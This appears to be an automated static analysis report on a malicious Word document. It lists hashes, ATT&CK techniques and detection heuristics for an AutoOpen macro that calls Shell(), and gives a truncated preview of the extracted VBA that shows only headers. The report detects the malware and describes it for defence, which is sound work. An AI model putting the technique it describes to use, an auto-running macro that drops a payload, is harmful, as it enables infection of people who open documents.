Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0b22b9592f078cb1…

MALICIOUS

Office (OLE)

Size: 67.4 KB
Created: 2017-11-02 21:50:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: a2cead92302348e6d9bef96c850c0f38
SHA-1: df805ce70e9e9664b7213d1bc65a0889aaa83d09
SHA-256: 0b22b9592f078cb146c84386614847913a36ede05497224253de2fcc4d7c7da4
Risk Score: 184

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that uses the Shell() function. This indicates the document is designed to execute arbitrary code as soon as it is opened, likely downloading and running a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6364202-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6364202-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11082 bytes
SHA-256: c22f941ec63c8aa51237c855a8f3186114cc0c06320697daaa65186142681c15
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 29 long base64-like blobs)

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mCkrZzdFc"
Function palzSaHtE()
... (truncated)